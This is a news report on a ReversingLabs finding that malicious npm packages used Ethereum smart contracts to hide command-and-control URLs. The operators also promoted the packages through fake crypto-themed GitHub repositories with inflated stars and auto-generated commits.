Hackers use Ethereum smart contracts to conceal malware in code libraries: report

Cybercriminals are deploying a novel evasion tactic by using Ethereum smart contracts to bypass detection in malicious npm packages, as threat actors intensify digital attacks using open-source tooling, according to a report by software security firm ReversingLabs.

The malicious software-supply-chain campaign utilized code to conceal command-and-control (C2) instructions for Node Package Manager (NPM) packages, introducing dangerous open-source elements within an extensive collection of JavaScript libraries.

Lucija Valentic, a ReversingLabs researcher, stated that two packages that emerged in July, “colortoolsv2” and a clone, “mimelib2,” pulled C2 URLs from onchain contracts before fetching a second-stage downloader.

A technical write-up published on Wednesday revealed that the packages executed an obfuscated script, querying an Ethereum contract to retrieve the next-stage payload location, rather than hard-coding links in the package itself. This route complicates detection and takedown, marking a new kind of attack vector.

“That’s something we haven’t seen previously,” the security expert wrote, adding that it shows how quickly threat actors are improving detection evasion strategies. The operation also leaned on fake, crypto-themed GitHub repositories, complete with inflated stars and auto-generated commits, to convince developers to add the packages as dependencies.

Valentic said the malware family was taken down after being reported to npm maintainers. Meanwhile, ReversingLabs tied the incident to a broader, ongoing effort to seed malicious npm and GitHub projects presented as trading bots or crypto tools.

“Once we decided to dig deeper into the packages, we discovered evidence of a much larger campaign that was spread across both npm and GitHub, trying to lure developers into downloading repositories that included malicious npm packages,” the researcher wrote.

While the new tactic was shut down, it’s not the only code-related issue leveraging cryptographic technology. Beyond the two npm packages published in July, the company said the threat actors built credibility around decoy repositories such as “solana-trading-bot-v2,” which showed thousands of superficial commits, puppet maintainers, and coordinated stargazer activity, while the malicious dependency was quietly swapped between package names.

Also, ReversingLabs previously flagged related npm campaigns that abused developer trust and open-source tooling earlier this year.

“These latest attacks by threat actors, including the creation of sophisticated attacks using blockchain and GitHub, show that attacks on repositories are evolving,” said Valentic. “Developers and development organizations alike need to be on the lookout for efforts to implant malicious code in legitimate applications, gain access to sensitive development assets, and steal sensitive data and digital assets.”